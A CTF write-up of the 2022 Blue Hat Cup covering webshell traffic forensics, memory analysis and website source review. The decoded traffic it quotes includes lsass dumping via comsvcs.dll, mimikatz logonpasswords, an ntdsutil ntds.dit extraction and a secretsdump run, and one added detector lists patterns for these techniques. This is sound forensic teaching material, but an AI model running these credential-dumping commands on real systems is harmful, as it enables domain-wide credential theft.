蓝帽杯 (Blue Hat Cup) 2022 Writeup

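At the end of July I casually played the Blue Hat Cup, then kept putting off the writeup until now. It feels like I did nothing all summer, so I should write something.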

Misc

domainhacker

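I had been preparing for hvv, but it fell through because of the pandemic. Thanks to the training from that period, though, I recognized this immediately as AntSword (蚁剑) traffic. The traffic in this challenge is base64-encoded with a salt added, but it can be recovered from the code.

The parameters are easy to pick out in the request bodies of the capture. After decoding, the useful commands are, in order: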

cd /d "C:\\phpstudy_pro\\WWW"&powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 476 C:\windows\temp\lsass.dmp full"&echo efa923ba504&cd&echo 1a4be8815ef8
# Dump the process memory to lsass.dmp
cd /d "c:\\Windows\\Temp"&mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit" > 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8
# Use mimikatz to export the domain information in the memory dump to 1.txt
cd /d "c:\\Windows\\Temp"&rar.exe a -PSecretsPassw0rds 1.rar 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8
# Compress into a password-protected archive

This tells us the archive password is SecretsPassw0rds. A download request follows; carve the archive out of it and extract it to get 1.txt:

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : PDC$
Domain : TEST
Logon Server : (null)
Logon Time : 2022/4/15 22:22:24
SID : S-1-5-20
msv :
[00000003] Primary
* Username : PDC$
* Domain : TEST
* NTLM : 416f89c3a5deb1d398a1a1fce93862a7
* SHA1 : 54896b6f5e60e9be2b46332b13d0e0f110d6518f
tspkg :
wdigest :
* Username : PDC$
* Domain : TEST
* Password : (null)
kerberos :
* Username : pdc$
* Domain : test.local
* Password : 15 e0 7e 07 d9 9d 3d 42 45 40 38 ec 97 d6 25 59 c9 e8 05 d9 fa bd 81 f9 2e 05 67 84 e1 a3 a3 ec eb 65 ba 6e b9 60 9b dd 5a 74 4b 2e 07 68 94 fd a1 cb 2e 7b a2 13 07 31 34 c2 1d e8 95 53 43 38 61 91 53 2b c4 b0 3e ea 7a ac 03 60 1f bf e8 dc 00 c5 fe 13 ed 7a ca 88 32 fc d0 c6 ea d2 c7 b4 87 31 82 dd 4c 96 4f 23 80 39 2e 31 b0 cf 67 8e 63 b2 5e f9 77 32 44 05 8e 22 f9 0c 69 32 64 1b b8 2d a0 99 0e b8 0e 2c 10 b6 ff 6d 5f 11 c9 5e 46 eb 62 df 00 7a bd c6 7b 83 db 0f 58 ed ac a3 66 dd c2 ec df 9f 22 b3 34 0d 07 89 ea 3b 2b b1 e1 f9 e2 e5 85 cd a3 78 ae dd e3 98 78 39 8e 4f 49 5a b6 05 4c 6d 1a e6 fa 30 c7 c6 fb 4d dc b4 ca f6 3c 20 fe 70 eb e3 16 82 78 f8 49 8d 15 6a 15 10 ac d8 68 f8 ef ad 0c c2 39 f2 ca 80 ef 96
ssp : KO
credman :

The NTLM value is the flag: flag{416f89c3a5deb1d398a1a1fce93862a7}

domainhacker2

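Similarly, this is also AntSword traffic, but with a wider variety of commands (I would like to analyze the different kinds of traffic when I get the chance).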

Again, extract the useful commands:

cd /d "C:\\phpstudy_pro\\WWW"&dsquery computer&echo 1d3632&cd&echo 78bc462ab

This lists the computers in the domain (CN = Common Name, OU = Organizational Unit, DC = Domain Component):

"CN=PDC,OU=Domain Controllers,DC=test,DC=local"
"CN=EXCHANGE,CN=Computers,DC=test,DC=local"
"CN=SDC,OU=Domain Controllers,DC=test,DC=local"
"CN=testnew,CN=Computers,DC=test,DC=local"
"CN=WIN-PJ6ELFEG09P,CN=Computers,DC=test,DC=local"
"CN=testcomputer,CN=Computers,DC=test,DC=local"
"CN=t,CN=Computers,DC=test,DC=local"
"CN=tt,CN=Computers,DC=test,DC=local"

Get the local hostname:

cd /d "C:\\phpstudy_pro\\WWW"&hostname&echo 1d3632&cd&echo 78bc462ab

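The local machine is PDC; combined with the earlier domain information, this machine is the domain administrator.

A log.txt file was then created with the following content: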

ac i ntds
ifm
create full c:\windows\temp\new
q
q

Using the same method as this article (except that log.txt is fed in as the input stream), the key information is exported:

cd /d "C:\\phpstudy_pro\\WWW"&cmd.exe /c ntdsutil.exe < log.txt >err.txt 2>&1&echo 1d3632&cd&echo 78bc462ab

The output is written to err.txt, and the echoed result is:

ntdsutil.exe: 活动实例设置为“ntds”。
ntdsutil.exe: ifm: 正在创建快照...
成功生成快照集 {f9c1f274-352f-439a-bdaa-7c3dd12b17c9}。
快照 {2c502f9f-0060-4286-a0f3-f1c10becc9db} 已作为 C:\$SNAP_202204161011_VOLUMEC$\ 装载
已装载快照 {2c502f9f-0060-4286-a0f3-f1c10becc9db}。
正在启动碎片整理模式...
源数据库: C:\$SNAP_202204161011_VOLUMEC$\Windows\NTDS\ntds.dit
目标数据库: c:\windows\temp\new\Active Directory\ntds.dit

Defragmentation Status (% complete)

0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................

正在复制注册表文件...
正在复制 c:\windows\temp\new\registry\SYSTEM
正在复制 c:\windows\temp\new\registry\SECURITY
快照 {2c502f9f-0060-4286-a0f3-f1c10becc9db} 已卸载。
在 c:\windows\temp\new 中成功创建 IFM 媒体。
ifm: ntdsutil.exe: 1d3632

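Then, as in the previous challenge, the result is packed into an archive. The password is FakePassword123$, which I have to say is rather misleading: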

cd /d "c:\\Windows\\Temp"&rar.exe a -PFakePassword123$ ntds.rar new&echo 1d3632&cd&echo 78bc462ab
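
As an added example (not part of the original writeup), here is a small detector run over the command strings recovered in both challenges. It assumes command lines are available from process-creation logging; the rule names and the benign last sample line are constructed for illustration.

```python
import re

# Rule names are labels chosen for this example, not taken from any product.
RULES = {
    "lsass-dump-comsvcs": r"comsvcs\.dll\W+MiniDump",
    "mimikatz-sekurlsa": r"sekurlsa::",
    "ntdsutil-ifm-inline": r"ntdsutil(\.exe)?\b.*\bifm\b",
    "ntdsutil-stdin-script": r"ntdsutil(\.exe)?\s*<\s*\S+",
    "rar-password-archive": r"\brar(\.exe)?\s+a\b.*\s-p\S+",
    "webshell-echo-markers": r"&echo [0-9a-f]{4,}&cd&echo [0-9a-f]{4,}\s*$",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

# Indexes 0-4 are command strings copied from the decoded traffic in this
# writeup; index 5 is a constructed benign line.
SAMPLE = [
    r'cd /d "C:\\phpstudy_pro\\WWW"&powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 476 C:\windows\temp\lsass.dmp full"&echo efa923ba504&cd&echo 1a4be8815ef8',
    r'cd /d "c:\\Windows\\Temp"&mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit" > 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8',
    r'cd /d "c:\\Windows\\Temp"&rar.exe a -PFakePassword123$ ntds.rar new&echo 1d3632&cd&echo 78bc462ab',
    r'cd /d "C:\\phpstudy_pro\\WWW"&cmd.exe /c ntdsutil.exe < log.txt >err.txt 2>&1&echo 1d3632&cd&echo 78bc462ab',
    r'cd /d "C:\\phpstudy_pro\\WWW"&hostname&echo 1d3632&cd&echo 78bc462ab',
    r'rar.exe a backup.rar C:\inetpub\logs',
]

# Content of log.txt as shown in the writeup.
NTDSUTIL_SCRIPT = r"""ac i ntds
ifm
create full c:\windows\temp\new
q
q
"""

def scan(cmdline):
    """Return the sorted names of all rules that match one command line."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(cmdline))

def script_requests_ifm(script_text):
    """ntdsutil read its commands from a file here, so the command line never
    contains "ifm"; the redirected file itself has to be inspected."""
    lines = [line.strip().lower() for line in script_text.splitlines()]
    return "ifm" in lines and any(line.startswith("create ") for line in lines)

def triage(cmdlines):
    """Return (command line, matched rules) for every line with a match."""
    return [(c, hits) for c in cmdlines if (hits := scan(c))]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE):
        print(hits, "<-", cmd[:60])
    print("log.txt requests IFM:", script_requests_ifm(NTDSUTIL_SCRIPT))
```

The ntdsutil line matches only the stdin-redirect rule, not the inline `ifm` rule, which is why a signature on the command line alone would miss this case.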

We use impacket's secretsdump script to export the key information; note that the password history is needed:

python secretsdump.py -system "domainhacker2_184c16876d41965a695f89232ae5392d\new\registry\SYSTEM" -security "domainhacker2_184c16876d41965a695f89232ae5392d\new\registry\SECURITY" -ntds "domainhacker2_184c16876d41965a695f89232ae5392d\new\Active Directory\ntds.dit" LOCAL -just-dc-ntlm -history

Some mailbox service health-check accounts in the middle are omitted:

Impacket v0.10.1.dev1+20220708.213759.8b1a99f7 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0xf5a55bb9181f33269276949d2ad680e5
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 752aa10b88b269bd735d54b802d5c86c
[*] Reading and decrypting hashes from C:\Users\YuGao\Downloads\domainhacker2_184c16876d41965a695f89232ae5392d\new\Active Directory\ntds.dit
test.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:a85016dddda9fe5a980272af8f54f20e:::
test.local\Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:07ab403ab740c1540c378b0f5aaa4087:::
test.local\Administrator_history1:500:aad3b435b51404eeaad3b435b51404ee:34e92e3e4267aa7055a284d9ece2a3ee:::
test.local\Administrator_history2:500:aad3b435b51404eeaad3b435b51404ee:34e92e3e4267aa7055a284d9ece2a3ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Admin:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
test:1003:aad3b435b51404eeaad3b435b51404ee:4f95f1c5acfc3b972a1ce2a29ef1f1c5:::
test_history0:1003:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
test_history1:1003:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
PDC$:1004:aad3b435b51404eeaad3b435b51404ee:416f89c3a5deb1d398a1a1fce93862a7:::
PDC$_history0:1004:aad3b435b51404eeaad3b435b51404ee:77c3da77dc1b7a6c257ba59cd4633209:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8d9c46df1a433693842082203898424f:::
EXCHANGE$:1107:aad3b435b51404eeaad3b435b51404ee:8f203498c3054ed0e01efc9d1da10ecd:::
EXCHANGE$_history0:1107:aad3b435b51404eeaad3b435b51404ee:c5c7378155dc9d28ad53d8c1f9e9d915:::
......
test1:1149:aad3b435b51404eeaad3b435b51404ee:8cbbbea6034f5c9ea6bc4eb980efec4d:::
test1_history0:1149:aad3b435b51404eeaad3b435b51404ee:8cbbbea6034f5c9ea6bc4eb980efec4d:::
test1_history1:1149:aad3b435b51404eeaad3b435b51404ee:8cbbbea6034f5c9ea6bc4eb980efec4d:::
test1_history2:1149:aad3b435b51404eeaad3b435b51404ee:8cbbbea6034f5c9ea6bc4eb980efec4d:::
test1_history3:1149:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
SDC$:1151:aad3b435b51404eeaad3b435b51404ee:9f40caf799bf0d110fdf08b3bf3eb6c0:::
SDC$_history0:1151:aad3b435b51404eeaad3b435b51404ee:8f3cfaf7a6290b735bcbba5b60d554d4:::
SDC$_history1:1151:aad3b435b51404eeaad3b435b51404ee:7bfe440904b9611776477b85eea398fc:::
testnew$:1152:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
WIN-PJ6ELFEG09P$:1153:aad3b435b51404eeaad3b435b51404ee:6533cba50e01cace16567ec5691e587f:::
testcomputer$:1154:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
t$:1155:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
tt$:1156:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
WebApp01$:1157:aad3b435b51404eeaad3b435b51404ee:b021fa4e92913d91a6eade97884f508b:::
aaa:1158:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
[*] Cleaning up...

The challenge asks for the administrator's previous NTLM hash, so don't mix them up!

flag{07ab403ab740c1540c378b0f5aaa4087}
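
An added example (not part of the original writeup or of impacket): parsing the `user:rid:lmhash:nthash:::` lines shown above to pull out an account's previous hash and to flag hashes shared between accounts or belonging to an empty password. The function names are this example's own, and the sample is a subset of the lines above.

```python
import re
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Subset of the secretsdump lines shown in this writeup.
SAMPLE = r"""
test.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:a85016dddda9fe5a980272af8f54f20e:::
test.local\Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:07ab403ab740c1540c378b0f5aaa4087:::
test.local\Administrator_history1:500:aad3b435b51404eeaad3b435b51404ee:34e92e3e4267aa7055a284d9ece2a3ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Admin:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
test:1003:aad3b435b51404eeaad3b435b51404ee:4f95f1c5acfc3b972a1ce2a29ef1f1c5:::
test_history0:1003:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
PDC$:1004:aad3b435b51404eeaad3b435b51404ee:416f89c3a5deb1d398a1a1fce93862a7:::
PDC$_history0:1004:aad3b435b51404eeaad3b435b51404ee:77c3da77dc1b7a6c257ba59cd4633209:::
aaa:1158:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
"""

# Optional "domain\" prefix, user name, optional "_historyN" suffix, then fields.
LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+?)(?:_history(?P<idx>\d+))?"
    r":(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

def parse(text):
    """Return {user: {"rid": int, "current": nt or None, "history": {idx: nt}}}."""
    accounts = {}
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # banner lines, "......", blank lines
        acct = accounts.setdefault(
            m["user"], {"rid": int(m["rid"]), "current": None, "history": {}})
        if m["idx"] is None:
            acct["current"] = m["nt"]
        else:
            acct["history"][int(m["idx"])] = m["nt"]
    return accounts

def previous_hash(accounts, user):
    """history0 is the hash in use immediately before the current one."""
    return accounts[user]["history"].get(0)

def shared_hashes(accounts):
    """NT hashes that appear (current or history) under more than one account."""
    seen = defaultdict(set)
    for user, acct in accounts.items():
        for nt in [acct["current"], *acct["history"].values()]:
            if nt:
                seen[nt].add(user)
    return {nt: sorted(users) for nt, users in seen.items() if len(users) > 1}

def empty_password_accounts(accounts):
    """Accounts whose current NT hash is that of the empty password."""
    return sorted(u for u, a in accounts.items() if a["current"] == EMPTY_NT)

if __name__ == "__main__":
    accts = parse(SAMPLE)
    print("Administrator previous:", previous_hash(accts, "Administrator"))
    print("shared:", shared_hashes(accts))
    print("empty password:", empty_password_accounts(accts))
```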

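Digital Forensics

Mobile Forensics

This felt like a challenge made to advertise the 盘古石 (Pangu Stone) forensics product (half joking). Just search with the provided tool; a pure sign-in challenge.

Computer Forensics_1

Just run hashdump with the veteran tool volatility. Note that volatility3 is used very differently from v2, and there are hardly any tutorials online, so I fumbled around for quite a while.

Below is the simplest approach I ended up with; along the way I was using volshell, which was torture.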

.\vol.py -f 1.dmp windows.hashdump.Hashdump
Volatility 3 Framework 2.3.0
Progress: 100.00 PDB scanning finished
User rid lmhash nthash

Administrator 500 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0
Guest 501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0
taqi7 1000 aad3b435b51404eeaad3b435b51404ee 7f21caca5685f10d9e849cc84c340528
naizheng 1002 aad3b435b51404eeaad3b435b51404ee d123b09e13b1a82277c3e3f0ca722060
qinai 1003 aad3b435b51404eeaad3b435b51404ee 1c333843181864a58156f3e9498fe905

Looking up 7f21caca5685f10d9e849cc84c340528 on an MD5 lookup site gives anxinqi.

Computer Forensics_2

Again with volatility:

.\vol.py -f "C:\Users\YuGao\Documents\Tencent Files\2645943187\FileRecv\计算机取证\1.dmp" windows.pslist.PsList > log.txt
Volatility 3 Framework 2.3.0

PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output

4 0 System 0xfa800ccc7890 105 623 N/A False 2022-04-28 05:38:41.000000 N/A Disabled
288 4 smss.exe 0xfa800d9c3610 2 29 N/A False 2022-04-28 05:38:41.000000 N/A Disabled
384 376 csrss.exe 0xfa800e100740 9 486 0 False 2022-04-28 05:38:42.000000 N/A Disabled
424 376 wininit.exe 0xfa800e4a3840 3 78 0 False 2022-04-28 05:38:43.000000 N/A Disabled
436 416 csrss.exe 0xfa800e4a7b30 10 645 1 False 2022-04-28 05:38:43.000000 N/A Disabled
492 416 winlogon.exe 0xfa800e50b060 5 116 1 False 2022-04-28 05:38:43.000000 N/A Disabled
532 424 services.exe 0xfa800e523910 6 216 0 False 2022-04-28 05:38:43.000000 N/A Disabled
544 424 lsass.exe 0xfa800e52fb30 6 614 0 False 2022-04-28 05:38:43.000000 N/A Disabled
552 424 lsm.exe 0xfa800e489060 11 209 0 False 2022-04-28 05:38:43.000000 N/A Disabled
...
1020 776 audiodg.exe 0xfa800e6f7060 6 131 0 False 2022-04-28 05:38:44.000000 N/A Disabled
420 532 svchost.exe 0xfa800e722060 9 530 0 False 2022-04-28 05:38:44.000000 N/A Disabled
956 532 ZhuDongFangYu. 0xfa800e749b30 26 394 0 True 2022-04-28 05:38:44.000000 N/A Disabled
1040 532 svchost.exe 0xfa800e75a950 23 636 0 False 2022-04-28 05:38:44.000000 N/A Disabled
1300 532 spoolsv.exe 0xfa800e85b570 12 313 0 False 2022-04-28 05:38:45.000000 N/A Disabled
1336 532 svchost.exe 0xfa800e88cb30 17 321 0 False 2022-04-28 05:38:45.000000 N/A Disabled
1440 532 svchost.exe 0xfa800e907630 4 81 0 True 2022-04-28 05:38:45.000000 N/A Disabled
1548 532 vmtoolsd.exe 0xfa800e9c6740 9 276 0 False 2022-04-28 05:38:45.000000 N/A Disabled
1960 532 svchost.exe 0xfa800eabd060 5 101 0 False 2022-04-28 05:38:46.000000 N/A Disabled
1612 532 dllhost.exe 0xfa800eb07b30 13 186 0 False 2022-04-28 05:38:46.000000 N/A Disabled
2068 532 msdtc.exe 0xfa800eb36b30 12 144 0 False 2022-04-28 05:38:48.000000 N/A Disabled
2512 532 svchost.exe 0xfa800eabe980 11 146 0 False 2022-04-28 05:40:46.000000 N/A Disabled
2584 532 svchost.exe 0xfa800ea79b30 13 335 0 False 2022-04-28 05:40:46.000000 N/A Disabled
2648 532 SearchIndexer. 0xfa800eaa8310 11 658 0 False 2022-04-28 05:40:47.000000 N/A Disabled
1792 660 WmiPrvSE.exe 0xfa800ea7a0f0 7 114 0 False 2022-04-28 05:42:48.000000 N/A Disabled
916 532 taskhost.exe 0xfa800cdf4b30 9 209 1 False 2022-04-28 05:42:55.000000 N/A Disabled
972 920 dwm.exe 0xfa800cdfe210 3 70 1 False 2022-04-28 05:42:55.000000 N/A Disabled
2044 1716 explorer.exe 0xfa800e585b30 53 1335 1 False 2022-04-28 05:42:55.000000 N/A Disabled
2672 2044 vmtoolsd.exe 0xfa800e83eb30 7 209 1 False 2022-04-28 05:42:56.000000 N/A Disabled
2664 2044 ldnews.exe 0xfa800e84f780 10 363 1 True 2022-04-28 05:42:56.000000 N/A Disabled
2436 956 360Tray.exe 0xfa800ea25580 150 1455 1 True 2022-04-28 05:42:57.000000 N/A Disabled
3500 2288 LiveUpdate360. 0xfa800edc8b30 18 305 1 True 2022-04-28 05:43:13.000000 N/A Disabled
4012 3784 360TptMon.exe 0xfa800ee90b30 17 415 1 True 2022-04-28 05:43:22.000000 N/A Disabled
3316 532 svchost.exe 0xfa800ee6bb30 3 57 0 True 2022-04-28 05:43:23.000000 N/A Disabled
3396 2436 SoftMgrLite.ex 0xfa800eb76b30 30 360 1 True 2022-04-28 05:44:13.000000 N/A Disabled
3496 2044 TrueCrypt.exe 0xfa800ec4b630 5 268 1 True 2022-04-28 05:46:22.000000 N/A Disabled
2964 3496 TrueCrypt Form 0xfa800ea45b30 0 - 1 False 2022-04-28 05:46:35.000000 2022-04-28 05:47:59.000000 Disabled
2548 2648 SearchProtocol 0xfa800ed78720 7 316 0 False 2022-04-28 05:52:53.000000 N/A Disabled
2872 2044 notepad.exe 0xfa800ec2e6f0 1 62 1 False 2022-04-28 05:54:13.000000 N/A Disabled
2192 2044 MagnetRAMCaptu 0xfa800f103b30 16 333 1 True 2022-04-28 05:54:30.000000 N/A Disabled
3880 2436 360speedld.exe 0xfa800ea7b910 4 94 1 True 2022-04-28 05:54:54.000000 N/A Disabled
3604 660 dllhost.exe 0xfa800ef76b30 6 91 1 False 2022-04-28 05:54:55.000000 N/A Disabled

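There is a MagnetRAMCaptu process, which is obviously the one that created the memory image; its PID is the answer.

Website Forensics_1

Searching directly for common webshell signatures such as assert and eval finds it right away.

The backdoor is in the runtime\temp directory.

Website Forensics_2

Searching the source for "数据库" (database) turns up database.php, which defines the database settings.

It includes encrypt/encrypt.php, and the password is produced by my_encrypt().

Following that, locate the my_encrypt function and simply run it: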

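function my_encrypt(){
    // Despite its name, this function decrypts the hard-coded ciphertext
    // (Rijndael-128 in CBC mode via mcrypt) and returns the plaintext password.
    // The mcrypt extension was removed from PHP core in 7.2, so run it on an older PHP.
    $str = 'P3LMJ4uCbkFJ/RarywrCvA==';
    $str = str_replace(array("/r/n", "/r", "/n"), "", $str);
    $key = 'PanGuShi';
    // The IV is the first 16 hex characters of sha1($key)
    $iv = substr(sha1($key),0,16);
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
    mcrypt_generic_init($td, "PanGuShi", $iv);
    $decode = base64_decode($str);
    $dencrypted = mdecrypt_generic($td, $decode);
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    // Strip the padding bytes left at the end of the last block
    $dencrypted = trim($dencrypted);
    return $dencrypted;
}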

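This gives the answer KBLT123.

Website Forensics_3

The variable names related to amounts all involve money; searching the source finds $param['money'] = $this->encrypt($param['money']);

Look at the encrypt function: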

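function encrypt($data, $key = 'jyzg123456')
{
    $key = md5($key);
    $x = 0;
    $len = strlen($data);
    $l = strlen($key);
    $char = '';
    $str = '';
    // Repeat md5($key) (32 hex characters) until it is as long as the data.
    // $key{$x} is the old curly-brace string offset syntax (removed in PHP 8.0),
    // equivalent to $key[$x].
    for ($i = 0; $i < $len; $i++)
    {
        if ($x == $l)
        {
            $x = 0;
        }
        $char .= $key{$x};
        $x++;
    }
    // Add the keystream byte to each data byte, then base64-encode the result
    for ($i = 0; $i < $len; $i++)
    {
        $str .= chr(ord($data{$i}) + (ord($char{$i})) % 256);
    }
    return base64_encode($str);
}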

So the salt is jyzg123456.

Website Forensics_4

First work out what the tables and columns in the database are for:

COMMENT ON COLUMN "public"."tab_user"."id" IS '用户id';
COMMENT ON COLUMN "public"."tab_user"."name" IS '用户名';
COMMENT ON COLUMN "public"."tab_user"."password" IS '用户密码';
COMMENT ON COLUMN "public"."tab_user"."role" IS '用户权限角色
1:超级管理员
2:系统管理员
3:仓库管理员
4:门店管理员
5:分销商
6:装修公司
7:业务员
8:技术员';
COMMENT ON COLUMN "public"."tab_user"."state" IS '激活状态(1:激活使用 ,2:暂停使用)';
COMMENT ON COLUMN "public"."tab_user"."belong_to" IS '所属门店';
COMMENT ON COLUMN "public"."tab_user"."nick_name" IS '用户姓名';
COMMENT ON COLUMN "public"."tab_user"."sex" IS '性别(1:男 2:女)';
COMMENT ON COLUMN "public"."tab_user"."tel" IS '联系电话';
COMMENT ON COLUMN "public"."tab_user"."address" IS '地址';
COMMENT ON COLUMN "public"."tab_user"."report_num" IS '业务员最大报备数';
COMMENT ON COLUMN "public"."tab_user"."is_create_time" IS '创建时间';
COMMENT ON TABLE "public"."tab_user" IS '用户表';

INSERT INTO "public"."tab_user" VALUES (3, '张宝', '967ee505bd742d713528ad2e55a04bba', 3, 1, NULL, '', 1, '', '', NULL, '158720003133', NULL, '2018-04-09 19:00:00');
INSERT INTO "public"."tab_user" VALUES (4, '李进', '34b5c38d19b3352df6db3e976b237d37', 3, 1, NULL, '', 1, '', '', NULL, '18765877676', NULL, '2018-04-09 19:00:00');
INSERT INTO "public"."tab_user" VALUES (5, '王子豪', 'f783ca62ff21833fdcfe3b74e1a82e1c', 3, 1, NULL, '王子豪', 1, '', '', NULL, '', NULL, '2020-04-18 16:04:53');
INSERT INTO "public"."tab_user" VALUES (6, '赵燕', 'bca725be29834465fa5a9e3bc6423b48', 3, 1, NULL, '赵燕', 2, '', '', NULL, '', NULL, '2020-04-18 16:06:06');
INSERT INTO "public"."tab_user" VALUES (1, 'superAdmin', 'ca6d00723bc83590c909b0decc97e34d', 1, 1, NULL, '', 1, '', '', NULL, '158736346560', NULL, '2018-04-08 18:02:21');
INSERT INTO "public"."tab_user" VALUES (2, 'admin', 'aa590a519a1c4862c5051a9bb0e07456', 2, 1, NULL, '', 1, '', '', NULL, '158736377751', NULL, '2018-04-09 18:22:21');

COMMENT ON COLUMN "public"."tab_channel_order_list"."order_num" IS '订单号';
COMMENT ON COLUMN "public"."tab_channel_order_list"."currency" IS '币种';
COMMENT ON COLUMN "public"."tab_channel_order_list"."remark" IS '备注';
COMMENT ON COLUMN "public"."tab_channel_order_list"."is_create_time" IS '创建时间';
COMMENT ON COLUMN "public"."tab_channel_order_list"."payee_id" IS '收款人ID';
COMMENT ON COLUMN "public"."tab_channel_order_list"."payer_id" IS '付款人ID';

-- ----------------------------
-- Records of tab_channel_order_list
-- ----------------------------
INSERT INTO "public"."tab_channel_order_list" VALUES (1, '271188138699', 'GG币', NULL, '2022-04-01 00:00:50', 4, 2, 'nJ1xlG5v');
...
INSERT INTO "public"."tab_channel_order_list" VALUES (5000, '622260854407', 'GG币', NULL, '2022-04-30 23:55:13', 4, 3, 'lJRvnWtr');

Process the statements into a format that is easy to read:

data.txt

(1, '271188138699', '2022-04-01 00:00:50', 4, 2, 'nJ1xlG5v')
(2, '272206877227', '2022-04-01 00:23:01', 4, 3, 'lpZqmGps')
...
(4998, '331754109613', '2022-04-30 23:32:04', 6, 2, 'mplrlW9p')
(4999, '109211499552', '2022-04-30 23:35:25', 4, 6, 'mphwnXBr')
(5000, '622260854407', '2022-04-30 23:55:13', 4, 3, 'lJRvnWtr')

exchange_rate.txt

('1', 0.05, '2022-04-01')
('2', 0.04, '2022-04-02')
('3', 0.06, '2022-04-03')
('4', 0.05, '2022-04-04')
('5', 0.07, '2022-04-05')
('6', 0.10, '2022-04-06')
('7', 0.15, '2022-04-07')
('8', 0.17, '2022-04-08')
('9', 0.23, '2022-04-09')
('10', 0.22, '2022-04-10')
('11', 0.25, '2022-04-11')
('12', 0.29, '2022-04-12')
('13', 0.20, '2022-04-13')
('14', 0.28, '2022-04-14')
('15', 0.33, '2022-04-15')
('16', 0.35, '2022-04-16')
('17', 0.35, '2022-04-17')
('18', 0.37, '2022-04-18')
('19', 0.38, '2022-04-19')
('20', 0.40, '2022-04-20')
('21', 0.38, '2022-04-21')
('22', 0.39, '2022-04-22')
('23', 0.45, '2022-04-23')
('24', 0.44, '2022-04-24')
('25', 0.50, '2022-04-25')
('26', 0.55, '2022-04-26')
('27', 0.51, '2022-04-27')
('28', 0.52, '2022-04-28')
('29', 0.53, '2022-04-29')
('30', 0.50, '2022-04-30')

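Then pick out the transfer records the challenge asks for, decrypt them based on the encryption script from the previous challenge, convert them to RMB at the exchange rate, and sum them.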

<?php
// Inverse of encrypt() from the previous challenge: base64-decode, then
// subtract the repeating md5($key) keystream from each byte.
function decrypt($data, $key = 'jyzg123456') {
    $key = md5($key);
    $x = 0;
    $data = base64_decode($data);
    $len = strlen($data);
    $l = strlen($key);
    $char = '';
    $str = '';
    for ($i = 0; $i < $len; $i++) {
        if ($x == $l) {
            $x = 0;
        }
        $char .= $key[$x];
        $x++;
    }
    for ($i = 0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) - ord($char[$i]) + 256) % 256);
    }
    return $str;
}

// Daily exchange rates: $rate[0] is 2022-04-01, $rate[1] is 2022-04-02, ...
$file = fopen("exchange_rate.txt", "r");
$rate = array();
while (($str = fgets($file)) !== false) {
    list($id, $x, $time) = sscanf($str, "(%s %f, %s)");
    $rate[] = $x;
}
fclose($file);

// 3 -> 5: transfers paid by user 3 to user 5
$file = fopen("data.txt", "r");
$res = 0;
while (($str = fgets($file)) !== false) {
    list($id_1, $id_2, $date, $time, $to, $from, $enc) = sscanf($str, "(%d, %s %s %s %d, %d, %s)");
    if ($from != 3 || $to != 5) {
        continue;
    }
    // Strip the leading quote and the trailing ') from the ciphertext field
    $enc = substr($enc, 1, strlen($enc) - 3);
    // Day of month minus one, used as the 0-based index into $rate
    $date = (int) substr($date, strlen($date) - 2, 2) - 1;
    // Keep only indexes 1 to 17, i.e. 2022-04-02 through 2022-04-18
    if ($date < 1 || $date > 17) {
        continue;
    }
    $res = $res + $rate[$date] * decrypt($enc);
}
echo $res;
fclose($file);

The final answer is 15758353.76